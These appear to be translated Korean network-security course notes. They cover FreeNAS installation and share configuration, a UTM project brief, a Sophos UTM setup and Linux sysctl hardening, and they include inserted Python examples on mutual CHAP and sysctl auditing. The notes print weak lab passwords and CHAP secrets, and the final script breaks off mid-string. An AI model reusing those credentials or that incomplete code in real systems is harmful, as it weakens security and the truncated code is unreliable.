Representative NAS-dedicated operating systems

FreeNAS(http://www.freenas.org)

NAS4Free

OpenMediaVault


For a detailed comparison of NAS-dedicated operating systems, see the site below.

http://gigglehd.com/zbxe/12355614



About FreeNAS (http://www.freenas.org/about/features.html)


(1) Storage, liberated.

(2) Network-attached-storage (NAS) software that is both free to use and free as in open source code.

(3) Your data's best friend.


FreeNAS is an operating system that can be installed on virtually any hardware platform to share computer data storage over a computer network. 'Free' as in 'free and open source' and 'NAS' as in "network-attached storage", FreeNAS is the simplest way to create a centralized and easily-accessible home for your data.


The FreeNAS project and software were founded in 2005 on the principle that network storage be made available to the world at no cost and unencumbered by license restrictions. The FreeNAS Project has a mature community and a team of developers dedicated to meeting that goal and providing the best (open-source) network file storage solution in the world.


Replication

ZFS Snapshots are more than just local backups - they can be used to create remote backups as well. Replicating snapshots of the filesystem to a remote ZFS filesystem creates a complete duplicate there. Furthermore, additional snapshots of the same filesystem can be sent incrementally, reducing the size of each backup to the changes that were made between snapshots. In case of catastrophic damage to a local ZFS filesystem (such as disk failure in excess of parity protection or irrecoverable log device failure), any backed-up snapshot can be sent to a new ZFS filesystem, recovering all data up to that backup.


Data Protection

ZFS is designed for data integrity from top to bottom. RAID-Z, the software RAID that is part of ZFS, offers single parity protection like RAID 5, but without the “write hole” vulnerability thanks to the copy-on-write architecture of ZFS. The additional levels RAID-Z2 and RAID-Z3 offer double and triple parity protection, respectively. A software mirror option is also available. The FreeNAS Volumes screen lists each possible parity arrangement based on the number of disks you select when creating a new volume.

Every ZFS filesystem is also verified with checksums from top to bottom to ensure data integrity. If inconsistencies are found, parity blocks can be used to repair corrupt data. A regular scrub is turned on by default and can be rescheduled or configured from the web interface.


Backup Services
- Windows Backup
- Apple Time Machine
- rsync
- PC-BSD Life Preserver


Encryption

FreeNAS is the first and only open source project to offer encryption on ZFS volumes! A full-volume encryption option is available during volume creation, providing industry standard AES-XTS encryption which can be hardware-accelerated (when the processor has AES-NI capability).

Encrypted volumes can only be read by FreeNAS systems in possession of the master key for that volume. The user can optionally create a passphrase to add an additional layer of protection for when the whole system is stolen.

Encryption allows for confidence when retiring and recycling hard drives, because the drives no longer need to be wiped provided the master keys are obliterated.


Snapshots

Thanks to ZFS, snapshots of the entire filesystem can be made and saved at any time. As long as a snapshot exists, administrators can access files as they were when the snapshot was made.

Snapshots can be made on a one-off basis or scheduled as a cron job from the web interface. At any time, the entire filesystem can be rolled back to the most recent snapshot. Older snapshots can be cloned and accessed to recover data from that version of the filesystem. From the web interface, users can see how much space a particular snapshot is occupying on the volume and delete, clone, or roll back to individual snapshots as needed.


File Sharing

File sharing is what FreeNAS does best. Every major operating system is supported with SMB/CIFS (Windows file shares), NFS (Unix file shares) and AFP (Apple File Shares); FTP, iSCSI (block sharing), WebDAV and other methods of sharing data over the network are also available. iSCSI also supports VMware VAAI, Microsoft ODX and Microsoft Windows Server 2008 and 2012 R2 Clustering.

Most operating systems, including Windows, Mac OS X, many Linux distributions, and PC-BSD® can connect using SMB shares with little or no additional configuration needed on the client side. Most Unix-like operating systems support connecting with NFS out of the box, and free clients are widely available. AFP is primarily used by Mac OSX and is well suited for a network environment that only connects with Macintosh clients. FreeNAS® also supports Time Machine backups with a few minor tweaks on the system being backed up.


Web Interface

If FreeNAS has one goal, it’s simplifying complex administrative tasks for as wide a user base as possible. Every aspect of a FreeNAS system can be managed from a Web User Interface. A setup Wizard further simplifies configuration at installation time or later in the setup process. Volume creation, or the setting of permissions on individual shares or performing software updates, can be done without missing a critical step or encountering a silent failure.

Of course, the FreeNAS Team knows we can’t think of everything. Many services have advanced configuration options available in the advanced menus of the Web User Interface. The full power of the FreeBSD shell environment is also available just a click away or through SSH. Ultimately, FreeNAS makes NAS deployment easier than ever but doesn’t get between you and the solution you need.


Plugins

FreeNAS® supports the core features of a NAS appliance out of the box. However, many users like to enhance their NAS appliance with third party software for media streaming, alternative protocols, or web applications.

To make sure your NAS can do everything you want, FreeNAS offers a third-party plugin system based on the FreeBSD jails system and the PBI system from PC-BSD. The plugin system isolates third-party software from the core operating system but allows plugins access to user-specified directories and configuration from the main Web User Interface.



FreeNAS documentation is available at the sites below.

http://doc.freenas.org/

http://doc.freenas.org/9.3/freenas.html

http://web.freenas.org/images/resources/freenas9.2.1/freenas9.2.1_guide.pdf

http://www.freenas.org/images/resources/freenas8.3.1/freenas8.3.1_guide.html








[Lab 1] Installing FreeNAS


YouTube video of the installation process

https://www.youtube.com/watch?v=k-mRgeDS8rk


Prerequisites

VMware Workstation

FreeNAS ISO image


(Assumption) VMware Workstation is assumed to be installed already.


① Create a VM for FreeNAS


Select a Guest Operating System

Guest operating system : Other

Version : FreeBSD 64-bit


Name the virtual Machine

Virtual machine name : FreeNAS

Location : any suitable location


Specify Disk Capacity

Maximum disk size(GB) : 20.0

[ V ] Store virtual disk as a single file


MEM : about 1 GB

CPU : set the number of cores

CD/DVD : point to the ISO image


Attach 7 new disks. (Note: only disks larger than 2 GB may be attached.)

3 GB : 2 disks

4 GB : 2 disks

5 GB : 3 disks


② FreeNAS installation procedure


Power on the FreeNAS VM


■ GNU GRUB version 2.02~beta2 screen : <ENTER>

■ FreeNAS 9.3.1-STABLE Console Setup : 1  Install/Upgrade

■ Choose destination media : [ V ] da0 VMware, VMware Virtual S 1.0 -- 20.0 GiB

■ FreeNAS installation : <YES>

■ Enter your root password : soldesk1. (enter twice)

■ reboot


[Lab 2] FreeNAS initial configuration


Connect to FreeNAS from Windows and configure it.

- http://192.168.10.137

- ID/PASS: root/soldesk1.


When the Initial Wizard window appears, simply close it and configure everything manually.


The following main menus exist.

Account

System

Tasks

Network

Storage

Directory Service

Sharing

Services

Plugins

Jails

Reporting

Guide

Wizard

Display System Processes

Shell

Log Out

Reboot

Shutdown


① Network settings


Network > Global Configuration






② Language and time zone settings

System > General


On reconnecting, the interface will be displayed in Korean.





[Lab 3] Adding a user for sharing

Account > Users > Add User





[Lab 4] Creating a dataset and configuring a share for Linux


① Create a volume

Storage > Volumes > Volume Manager


② Create a dataset

Storage > Volumes > select SharePool > select the Create Dataset icon


③ Set permissions on the dataset

Storage > Volumes > SharePool > select LinuxShare1 > select Change Permission

-> Since this is for testing, all permissions were granted.


④ Configure the share

Sharing > Unix (NFS) > Add Unix (NFS) Share ((Note) also select Advanced Mode.)


⑤ Test mounting the shared resource from the Linux machine


Power on the linux200 server


linux200 network settings:

        IP/NETMASK : 192.168.10.200/24

        Gateway    : 192.168.10.2



# showmount -e 192.168.10.137

Export list for 192.168.10.137:

/mnt/SharePool/LinuxShare1 (everyone)


# mkdir -p /mnt/nas

# mount 192.168.10.137:/mnt/SharePool/LinuxShare1 /mnt/nas

# df -h

Filesystem    Type    Size  Used Avail Use% Mounted on

/dev/mapper/VolGroup00-LogVol00

              ext3     37G  3.6G   32G  11% /

/dev/sda1     ext3     99M   19M   76M  20% /boot

tmpfs        tmpfs    506M     0  506M   0% /dev/shm

/dev/hdc   iso9660    3.9G  3.9G     0 100% /media/CentOS_5.9_Final

192.168.10.137:/mnt/SharePool/LinuxShare1

               nfs    975M  128K  975M   1% /mnt/nas


# cd /mnt/nas

# cp /etc/passwd file1

# ls -l

total 4.5K

-rw-r--r-- 1 4294967294 root 2.0K Feb 16 13:01 file1

-> If file1 is not created, the permissions must be changed on the NAS.


# cd

# umount /mnt/nas

# df -h

-> confirm the unmount


Power off the linux200 server




[Lab 5] Creating a dataset and configuring a share for Windows


① Create a dataset

Storage > Volumes > select SharePool > select Create Dataset


② Change permissions

SharePool > select WindowsShare1 > Change Permission


③ Configure the share

Sharing > Windows (CIFS) > Add Windows (CIFS) Share

※ Uncheck "Use as home share"!!




④ Accessing the shared folder from the Windows server


Power on the Windows 2008 R2 server


Network settings:

        IP/NETMASK: 192.168.10.201/24

        Gateway   : 192.168.10.2



\\192.168.10.137

"Map Network Drive"


Right-click WindowsShare1 and select "Map Network Drive". (Note) You must check "[ V ] Connect using different credentials".


Map the network drive using the following information.

- ID/PASS: freenasuser1/freenas1


Try creating a file on the network drive.

[Reference] iSCSI configuration for Windows


① Configure Authorized Access

Sharing > Block(iSCSI) > Authorized Access > Add Authorized Access


User Secret : soldeskfreenas

Peer User Secret : soldeskfreenas1. / soldeskfreenas1,


② Add an initiator

Sharing > Block(iSCSI) > Initiators > Add Initiator


③ Add a portal

Sharing > Block(iSCSI) > Portals > Add Portal



④ Add a target

Sharing > Block(iSCSI) > Targets > Add Target


⑤ Configure device extents

Storage > Volumes > Volumes Manager >




Storage > Volumes > select iscsipool > select Create zvol

-> Create iscsidisk2 the same way. (Size: 100MiB)


Sharing > Block(iSCSI) > Extents > Add Extents



Sharing > Block(iSCSI) > Extents > Add Extents


Sharing > Block(iSCSI) > Associated Targets > Add Target / Extent



Sharing > Block(iSCSI) > Associated Targets > Add Target / Extent


⑥ Enable the iSCSI service

Services > iSCSI enable(ON)



⑦ Attaching the iSCSI disk on Windows


<CTRL + ESC> => search for "iscsi"

iSCSI Initiator Properties > Discovery > Discover Portal

iSCSI Initiator Properties > Discovery > Discover Portal > Advanced

 

Name(N)          : soldeskfreenas

Target secret(S) : soldeskfreenas1.


Proceed with the disk operations.

-> The lab for this part is not described separately.

->

https://www.synology.com/ko-kr/knowledgebase/DSM/tutorial/Virtualization/How_to_use_iSCSI_Targets_on_a_Windows_Server
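What the Authorized Access entry above actually buys you is mutual CHAP: the User Secret lets the target check the initiator, and the Peer Secret lets the initiator check the target. The following is an added example (not FreeNAS or Windows code) that walks through that exchange with the RFC 1994 MD5 method; the 12-16 character secret length is assumed to be the bound FreeNAS's form enforces, and the challenge bytes are generated here.

```python
"""Mutual CHAP as iSCSI uses it (RFC 1994 MD5 method) - added example, not
FreeNAS or Windows code. The 12-16 character secret length is assumed to be
the bound FreeNAS's Authorized Access form enforces; identifiers and challenge
bytes are generated here."""
import hashlib
import hmac
import os
from typing import Optional, Tuple

SECRET_MIN, SECRET_MAX = 12, 16   # assumed FreeNAS UI bounds


def check_secret(secret: str) -> str:
    if not SECRET_MIN <= len(secret) <= SECRET_MAX:
        raise ValueError(f"secret must be {SECRET_MIN}-{SECRET_MAX} characters, got {len(secret)}")
    return secret


def chap_response(chap_id: int, secret: str, challenge: bytes) -> bytes:
    """CHAP_R = MD5(CHAP_I || secret || CHAP_C), RFC 1994 section 4.1.
    CHAP_I is a single octet; the secret itself never crosses the wire."""
    if not 0 <= chap_id <= 255:
        raise ValueError("CHAP identifier is one octet")
    return hashlib.md5(bytes([chap_id]) + secret.encode() + challenge).digest()


class Peer:
    """One side of the login: answers challenges with its own secret and
    verifies the other side with the secret it holds for that side."""

    def __init__(self, name: str, own_secret: str, other_secret: str):
        self.name = name
        self.own_secret = check_secret(own_secret)
        self.other_secret = check_secret(other_secret)
        self.pending: Optional[Tuple[int, bytes]] = None

    def challenge(self) -> Tuple[int, bytes]:
        self.pending = (os.urandom(1)[0], os.urandom(16))  # fresh per login
        return self.pending

    def respond(self, chap_id: int, chal: bytes) -> bytes:
        return chap_response(chap_id, self.own_secret, chal)

    def verify(self, response: bytes) -> bool:
        if self.pending is None:
            return False
        chap_id, chal = self.pending
        self.pending = None                                 # single use
        expected = chap_response(chap_id, self.other_secret, chal)
        return hmac.compare_digest(expected, response)


def mutual_chap(initiator: Peer, target: Peer) -> Tuple[bool, bool]:
    """The target authenticates the initiator first (User/Secret on FreeNAS);
    only then does the initiator challenge the target (Peer User/Peer Secret).
    Returns (initiator_ok, target_ok)."""
    chap_id, chal = target.challenge()
    if not target.verify(initiator.respond(chap_id, chal)):
        return False, False                                 # login rejected here
    chap_id, chal = initiator.challenge()
    return True, initiator.verify(target.respond(chap_id, chal))


if __name__ == "__main__":
    # The lab's two secrets: the FreeNAS entry holds the User Secret (checks
    # the initiator) and the Peer Secret (lets the initiator check the target).
    user_secret, peer_secret = "soldeskfreenas", "soldeskfreenas1."
    freenas = Peer("freenas-target", own_secret=peer_secret, other_secret=user_secret)
    windows = Peer("windows-initiator", own_secret=user_secret, other_secret=peer_secret)
    print(mutual_chap(windows, freenas))                    # (True, True)
    rogue = Peer("rogue-initiator", "wrongsecret12345", peer_secret)
    print(mutual_chap(rogue, freenas))                      # (False, False)
```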


[Reference] Additional labs


iSCSI configuration (iSCSI configuration for Linux)
https://www.synology.com/ko-kr/knowledgebase/DSM/tutorial/Virtualization/How_to_set_up_and_use_iSCSI_target_on_Linux


Plugin installation and operation





[Reference] FreeNAS video portal


Be sure to consult the following site.

http://www.freenas.org/about/videos.html


FreeNAS 9.3 - iSCSI Overview

FreeNAS 9.3 Permissions Overview

How to Replace Failed HDDs in FreeNas 9.3

FreeNAS 9.3 - First Time Setup Wizard

FreeNAS 9.3 Shares Overview

How to install FreeNAS 9.3

How to Upgrade FreeNAS 9.3




        Network Security Project #4



Purpose: verify and test UTM functions

Team 1: verify and test F/W functions
Team 2: verify and test IPS/IDS functions
Team 3: verify and test WAF functions
Team 4: verify and test SPAM Filter functions



\\172.16.13.1
\Security과정공유디렉토리
\00_공지사항
\제08기_오전반_제4차_프로젝트


    File name: 제01조_홍길동_FW.txt
    -----------------------------------
    Project overview:
    Project schedule:
    Project members:
        Hong Gil-dong:
        Hong Gil-dong:
        Hong Gil-dong:
    -----------------------------------


\\172.16.13.1
\Security과정공유디렉토리
\00_공지사항
\제08기_오전반_제4차_프로젝트
\제04차_프로젝트
\제01조

    File name: <project files>












A manual presentation inevitably takes a lot of presentation time even if the content is trimmed


Felt like the best presentation so far

-> Because you spoke comfortably, without much nervousness (without freezing up)

-> The purpose of presenting, the reason we do it so often

-> The presentation posture was good (I thought it was what we might see at the final presentation)

-> The outward form was good, so now make the inside, the content, substantial


About 4 of the 6 months have passed

-> Two months can be seen as a lot of time left

-> Perhaps you are a bit adrift because you think little time is left? That is how it feels

-> Aren't you quite worn out? It looks like motivation has dropped a lot

-> It would be good to revive the initial resolve

-> There are still two whole months in which something can be done

-> You can do two more projects, and plenty of time remains for presentations in between

-> Let's keep our energy up


In practice, results are what matter

-> In study, the middle (the process) is what matters

-> Study is ongoing; it has no end and no conclusion

-> Study is continually ongoing, but in practice a conclusion must be reached within a set time, so results matter

-> The projects are run as a way to recognize that difference and become skilled at it


If you try and it doesn't work out, that can't be helped, but not trying from the start is not a good attitude


The evolution of security threats and security solutions



■ Evolution of security threats

Diversification of hacking techniques (manual methods -> automated methods)

Increasing threats to service availability

Increase in malicious traffic

Korea Press Computing Association (한국언론전산인협의회) presentation material (Topic 3: Security and Hacking Trends)


■ Development of security solutions

Today every company and institution has deployed, as its main security solutions,
- Firewall
- VPN
- IPS/IDS
- Anti-Virus
- Anti-Spam
- Network access control
- Other content security products
and these protect its various information assets.

Korea Press Computing Association (한국언론전산인협의회) presentation material (Topic 3: Security and Hacking Trends)



■ Unified Threat Management (UTM)

To prevent security incidents, respond to them quickly, and make security management easier, a UTM appliance is needed that integrates the existing security products, providing many functions while remaining easy to manage.

Korea Press Computing Association (한국언론전산인협의회) presentation material (Topic 3: Security and Hacking Trends)



FW vs IPS/IDS vs WAF





■ Firewall vs IDS (Intrusion Detection System) vs IPS (Intrusion Prevention System)


Category | IPS (Intrusion Prevention System) | IDS (Intrusion Detection System) | F/W (Firewall)
Connection method | In-Line | Mirror (TAP, Switch) | In-Line
Blocking method | Native | Reset signal, firewall integration | Native
One-way attack | Detect/Block | Detect | Not possible
DDoS & DoS | Detect/Block | Detect | Partial support
Recovery from service outage | Recovery via FOD | Not applicable | Recovery via HA, Fail Over
Real-time network session monitoring | Supported | Supported | Supported
Worm Virus | Detect/Block | Detect | Not possible
NAT | Not supported | Not supported | Supported
Multiple ports | 2 segments | 8 segments | Additional NIC connections supported
Advantages | Native detection and blocking modules for every packet protect the network | A native detection module for every packet warns of network anomalies | Access-control policies for services and objects can be specified in detail, restricting unnecessary services
Disadvantages | No support for firewall-native functions such as NAT limits private network configurations | Blocking is possible through integrated defense with a firewall (independent blocking is limited) | Cannot detect complex and sophisticated attacks beyond IP and port


Sophos Installation



■ Pre-installation requirements

- VMware Program(EX: VMWare Workstation 10.x)

- Sophos CD(EX: asg-9.304-9.1.iso)


■ VMware Workstation download

- http://www.vmware.com


■ Sophos program download

- https://www.sophos.com

- https://secure2.sophos.com/en-us/products/utm-9/free-utm-trial.aspx#start


■ Sophos network settings

eth0 IP : 192.168.10.254

eth1 IP : 192.168.20.254


■ Network diagram (EX: XX Bank network diagram)



Create a VM for the Sophos installation

- (Note) When creating the VM, be sure to install two Network Adapters.


Mount the Sophos CD image


□ Welcome to Sophos UTM 9! screen

=> <ENTER>


□ Introduction screen

=> <Start>





□ Detected Hardware screen

=> <Ok>


□ Select Keyboard screen

=> English (USA)





□ Select Timezone screen

=> Asia/

=> Seoul



□ Date and Time screen

=> <Next>





□ Select Admin Interface screen

=> eth1   [link]   VMware Pro/1000 MT Single Port Adapter

=> <Next>



□ Network Configuration screen

=> Address: 192.168.20.254

   Netmask: 255.255.255.0

   Gateway: none

=> <Next>





□ 64 bit Kernel Support screen

=> <Yes>



□ Enterprise Toolkit screen

=> <Yes>








□ Installation: Partitioning screen

=> <Yes>



□ Partition (Step #/6) screens

        Partitioning (Step 1/6) screen

        Formatting (Step 2/6) screen

        Copy Packages (Step 3/6) screen

        Install Open Source Software (Step 4/6) screen

        Install Enterprise Toolkit (Step 5/6) screen

        Finishing (Step 6/6) screen







□ Installation Finished screen

=> <Reboot>



□ Login prompt screen

Preparation is now complete, so connect through the web interface.

(Windows 7) https://192.168.20.254:4444


!!!! Once the installation is finished, be sure to take a snapshot. !!!!

1.  Sophos Unified Threat Management


Carry out the Sophos UTM "Basic System Setup".



■ Systems used

- Sophos VM

- Windows 7 VM



(Windows 7)


From the management system, Windows 7, connect to the Sophos UTM using the Chrome browser.

- https://192.168.20.254:4444



■ basic system setup

Hostname                        : utm.example.com

Company or Organization Name      : soldesk

City                            : Seoul

Country                          : South Korea

admin account password            : soldesk1.

Repeat password                  : soldesk1.

admin account email address       : admin@example.com





■ Login to WebAdmin

Username : admin

Password : soldesk1.


■ Setup wizard

[ v ] continue

[   ] Restore a backup


■ License Installation

License file : none

Without a license file, it can be used for only 30 days.


■ Internal (LAN) Network Settings

Internal (LAN) firewall IP : 192.168.20.254

Netmask                  : /24 (255.255.255.0)


■ Internet Uplink (WAN) Settings

Interface               : eth0

Internet uplink type      : Standard Ethernet interface with static IP address

Address Type             : static

IP address               : 192.168.10.254

Netmask                  : /24 (255.255.255.0)

Default gateway          : 192.168.10.2

DNS forwarder IP          : 168.126.63.1


■ Allowed Services


Allow these services for internal clients

[   ] Web (HTTP, HTTPS)

[   ] File transfer (FTP)

[   ] Terminal services (Citrix, Apple Remote Desktop, RDP, SSH, Telnet)

[   ] Email (SMTP, POP3, IMAP)

[   ] DNS (outgoing)


For security reasons we recommend disabling all options

[ v ] UTM responds to Pings

[   ] UTM forwards Pings




■ Advanced Threat Protection Settings

[   ] Intrusion Prevention Engine

[   ] Command & Control/Botnet Detection Engine


■ Web Protection Settings

-> Do not configure anything.


■ Email Protection Settings

[   ] Scan email fetched over POP3

[   ] Configure internal mail server





Finishing the Setup wizard screen








Reference videos


■ Setting up Sophos UTM - Training Episode 1

https://www.youtube.com/watch?v=mx6l1f6Bpy0


■ Using Sophos UTM Web Protection - Training Episode 2

https://www.youtube.com/watch?v=uI8NbEfxEs4


■ Using Sophos UTM Email Protection - Training Episode 3

https://www.youtube.com/watch?v=tozOXf-L-RY


■ Using Sophos UTM Intrusion Protection - Training Episode 4

https://www.youtube.com/watch?v=HDgJHFIp3Nk


■ How to setup Secure Sockets Layer (SSL) for a virtual private network (VPN) - Training Episode 5

https://www.youtube.com/watch?v=GGt26ZlerpQ&index=6&list=PL_b4O8ZwWOqs-aoLAMubLB1LhZwglTIoo


■ Setting up Web Filtering Profiles - Training Episode 6

https://www.youtube.com/watch?v=2v4_3bph6GA


■ Setting up Backup & Restore - Training Episode 7

https://www.youtube.com/watch?v=-ShStT59GLs



Linux Kernel Parameter


About Linux kernel parameters

-> A way to optimize the system by controlling the values of the Linux kernel's variables.

-> Linux kernel parameters live in the /proc/sys directory.

 

(e.g.) net.ipv4.icmp_echo_ignore_all <---> /proc/sys/net/ipv4/icmp_echo_ignore_all

 

How to set a kernel parameter

(temporary) # echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

(permanent) # sysctl -w net.ipv4.icmp_echo_ignore_all=1 ; sysctl -p

or

# vi /etc/sysctl.conf

net.ipv4.icmp_echo_ignore_all = 1

# sysctl -p

 

sysctl CMD, /etc/sysctl.conf

 

(1) sysctl CMD

 

NAME

sysctl - configure kernel parameters at runtime

 

SYNOPSIS

sysctl [-n] [-e] variable ...

sysctl [-n] [-e] [-q] -w variable=value ...

sysctl [-n] [-e] [-q] -p <filename>

sysctl [-n] [-e] -a

sysctl [-n] [-e] -A

 

DESCRIPTION

sysctl is used to modify kernel parameters at runtime. The parameters available are those listed under /proc/sys/. Procfs is required for sysctl(8) support in Linux. You can use sysctl(8) to both read and write sysctl data.

 

PARAMETERS

-n Use this option to disable printing of the key name when printing values.

 

-w Use this option when you want to change a sysctl setting.

 

-p Load in sysctl settings from the file specified or /etc/sysctl.conf if none given. Specifying - as filename means reading data from standard input.

 

-a Display all values currently available.

 

-A Same as -a

 

(Command format)

# sysctl -a (# sysctl -a | grep icmp)

# sysctl -p (/etc/sysctl.conf)

# sysctl -n net.ipv4.icmp_echo_ignore_all

# sysctl -w net.ipv4.icmp_echo_ignore_all=0

 

 

 

[Lab] sysctl CMD

 

Selecting the target

# sysctl -a | grep ip_forward

net.ipv4.ip_forward = 0

 

# sysctl -a

.... (omitted) ....

# sysctl -a | grep ip_forward

net.ipv4.ip_forward = 0

 

# sysctl -n net.ipv4.ip_forward

0

 

# sysctl -w net.ipv4.ip_forward=1

net.ipv4.ip_forward = 1

 

# sysctl -a | grep ip_forward

net.ipv4.ip_forward = 1

 

# cat /proc/sys/net/ipv4/ip_forward

1

 

# cat /etc/sysctl.conf | grep ip_forward

net.ipv4.ip_forward = 0

 

# sysctl -w net.ipv4.ip_forward=0

net.ipv4.ip_forward = 0

 

# cat /proc/sys/net/ipv4/ip_forward

0

 

# cat /etc/sysctl.conf | grep ip_forward

net.ipv4.ip_forward = 0

 

# vi /etc/sysctl.conf

# Kernel sysctl configuration file for Red Hat Linux

#

# For binary values, 0 is disabled, 1 is enabled. See sysctl(8) and

# sysctl.conf(5) for more details.

 

# Controls IP packet forwarding

[Before]

net.ipv4.ip_forward = 0

 

[After]

net.ipv4.ip_forward = 1

 

.... (omitted) ....

 

# sysctl -a | grep ip_forward

net.ipv4.ip_forward = 0

 

# cat /proc/sys/net/ipv4/ip_forward

0

 

# sysctl -p

net.ipv4.ip_forward = 1

net.ipv4.conf.default.rp_filter = 1

net.ipv4.conf.default.accept_source_route = 0

kernel.sysrq = 0

kernel.core_uses_pid = 1

net.ipv4.tcp_syncookies = 1

kernel.msgmnb = 65536

kernel.msgmax = 65536

kernel.shmmax = 4294967295

kernel.shmall = 268435456

 

# sysctl -a | grep ip_forward

net.ipv4.ip_forward = 1

 

# cat /proc/sys/net/ipv4/ip_forward

1

 

 

 

(2) The /etc/sysctl.conf file

 

# rpm -qa | grep kernel

kernel-2.6.18-411.el5

kernel-2.6.18-194.el5

kernel-headers-2.6.18-411.el5

kernel-2.6.18-411.el5 : kernel package

kernel-headers-2.6.18-411.el5 : kernel source code (EX: needed when installing drivers that are compiled before use)

 

# yum -y install kernel-doc

-> output omitted

 

# rpm -ql kernel-doc | grep sysctl

/usr/share/doc/kernel-doc-2.6.18/Documentation/networking/ip-sysctl.txt

/usr/share/doc/kernel-doc-2.6.18/Documentation/networking/ipvs-sysctl.txt

/usr/share/doc/kernel-doc-2.6.18/Documentation/sysctl

/usr/share/doc/kernel-doc-2.6.18/Documentation/sysctl/README

/usr/share/doc/kernel-doc-2.6.18/Documentation/sysctl/abi.txt

/usr/share/doc/kernel-doc-2.6.18/Documentation/sysctl/fs.txt

/usr/share/doc/kernel-doc-2.6.18/Documentation/sysctl/kernel.txt

/usr/share/doc/kernel-doc-2.6.18/Documentation/sysctl/sunrpc.txt

/usr/share/doc/kernel-doc-2.6.18/Documentation/sysctl/vm.txt

 

 

 

/etc/sysctl.conf example file

# The following is suitable for dedicated web server, mail, ftp server etc.

# ---------------------------------------

# BOOLEAN Values:

# a) 0 (zero) - disabled / no / false

# b) Non zero - enabled / yes / true

# --------------------------------------

# Controls IP packet forwarding

net.ipv4.ip_forward = 0

# Controls source route verification

net.ipv4.conf.default.rp_filter = 1

# Do not accept source routing

net.ipv4.conf.default.accept_source_route = 0

# Controls the System Request debugging functionality of the kernel

kernel.sysrq = 0

# Controls whether core dumps will append the PID to the core filename

# Useful for debugging multi-threaded applications

kernel.core_uses_pid = 1

# Controls the use of TCP syncookies

#net.ipv4.tcp_syncookies = 1

net.ipv4.tcp_synack_retries = 2

########## IPv4 networking start ##############

# Send redirects, if router, but this is just server

net.ipv4.conf.all.send_redirects = 0

net.ipv4.conf.default.send_redirects = 0

# Accept packets with SRR option? No

net.ipv4.conf.all.accept_source_route = 0

# Accept Redirects? No, this is not router

net.ipv4.conf.all.accept_redirects = 0

net.ipv4.conf.all.secure_redirects = 0

# Log packets with impossible addresses to kernel log? yes

net.ipv4.conf.all.log_martians = 1

net.ipv4.conf.default.accept_source_route = 0

net.ipv4.conf.default.accept_redirects = 0

net.ipv4.conf.default.secure_redirects = 0

# Ignore all ICMP ECHO and TIMESTAMP requests sent to it via broadcast/multicast

net.ipv4.icmp_echo_ignore_broadcasts = 1

# Prevent against the common 'syn flood attack'

net.ipv4.tcp_syncookies = 1

# Enable source validation by reversed path, as specified in RFC1812

net.ipv4.conf.all.rp_filter = 1

net.ipv4.conf.default.rp_filter = 1

########## IPv6 networking start ##############

# Number of Router Solicitations to send until assuming no routers are present.

# This is host and not router

net.ipv6.conf.default.router_solicitations = 0

# Accept Router Preference in RA?

net.ipv6.conf.default.accept_ra_rtr_pref = 0

# Learn Prefix Information in Router Advertisement

net.ipv6.conf.default.accept_ra_pinfo = 0

# Setting controls whether the system will accept Hop Limit settings from a router advertisement

net.ipv6.conf.default.accept_ra_defrtr = 0

#router advertisements can cause the system to assign a global unicast address to an interface

net.ipv6.conf.default.autoconf = 0

#how many neighbor solicitations to send out per address?

net.ipv6.conf.default.dad_transmits = 0

# How many global unicast IPv6 addresses can be assigned to each interface?

net.ipv6.conf.default.max_addresses = 1

########## IPv6 networking ends ##############

#Enable ExecShield protection

kernel.exec-shield = 1

kernel.randomize_va_space = 1

# TCP and memory optimization

# increase TCP max buffer size setable using setsockopt()

#net.ipv4.tcp_rmem = 4096 87380 8388608

#net.ipv4.tcp_wmem = 4096 87380 8388608

# increase Linux auto tuning TCP buffer limits

#net.core.rmem_max = 8388608

#net.core.wmem_max = 8388608

#net.core.netdev_max_backlog = 5000

#net.ipv4.tcp_window_scaling = 1

# increase system file descriptor limit

fs.file-max = 65535

#Allow for more PIDs

kernel.pid_max = 65536

#Increase system IP port limits

net.ipv4.ip_local_port_range = 2000 65000

 

Reference site

http://www.cyberciti.biz/faq/linux-kernel-etcsysctl-conf-security-hardening/
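A practitioner usually wants two checks on a file like the one above: does it set the hardening values it should, and has it actually been applied (the lab shows that editing /etc/sysctl.conf changes nothing until sysctl -p). The following is an added example, not part of the post or of sysctl itself: a parser for the sysctl.conf format, an audit against a baseline taken from the example file's values, and a comparison with running values. The sample file and the "running" values are constructed here.

```python
"""Audit a sysctl.conf-style file against a hardening baseline - added example.
The baseline values are the ones the page's example /etc/sysctl.conf sets;
SAMPLE_CONF and SAMPLE_RUNNING are constructed inputs in that format."""
from typing import Dict, List, Tuple

# Expected values, taken from the example file above (constructed subset).
BASELINE: Dict[str, str] = {
    "net.ipv4.ip_forward": "0",
    "net.ipv4.conf.all.accept_source_route": "0",
    "net.ipv4.conf.default.accept_source_route": "0",
    "net.ipv4.conf.all.accept_redirects": "0",
    "net.ipv4.conf.all.send_redirects": "0",
    "net.ipv4.conf.all.log_martians": "1",
    "net.ipv4.icmp_echo_ignore_broadcasts": "1",
    "net.ipv4.tcp_syncookies": "1",
    "net.ipv4.conf.all.rp_filter": "1",
    "kernel.randomize_va_space": "1",
}


def parse_sysctl_conf(text: str) -> Dict[str, str]:
    """Parse 'key = value' lines. '#' and ';' start comments, blank lines are
    skipped, and a later duplicate key wins, as when sysctl -p applies the file
    top to bottom. Slash-separated keys are normalised to dotted form."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue                      # a commented-out setting sets nothing
        if "=" not in line:
            continue                      # malformed line; sysctl -p would warn and skip it
        key, value = line.split("=", 1)
        key = key.strip().replace("/", ".")
        settings[key] = " ".join(value.split())   # collapse spacing in multi-value entries
    return settings


def audit(settings: Dict[str, str], baseline: Dict[str, str] = BASELINE) -> List[Tuple[str, str, str]]:
    """Return (key, expected, actual) for every baseline key that is missing or
    differs in the file; actual is '<unset>' when the file does not set the key."""
    findings = []
    for key, expected in baseline.items():
        actual = settings.get(key, "<unset>")
        if actual != expected:
            findings.append((key, expected, actual))
    return findings


def pending_changes(file_settings: Dict[str, str], running: Dict[str, str]) -> Dict[str, Tuple[str, str]]:
    """Keys whose file value differs from the running kernel value, i.e. edits
    that have not been applied with sysctl -p yet. Returns key -> (running, file)."""
    return {k: (running[k], v) for k, v in file_settings.items()
            if k in running and running[k] != v}


# Constructed sample in the page's format: forwarding left on, syncookies
# commented out, one key written with slashes, one multi-value entry.
SAMPLE_CONF = """\
# Controls IP packet forwarding
net.ipv4.ip_forward = 1
net.ipv4.conf.default.rp_filter = 1
#net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_synack_retries = 2
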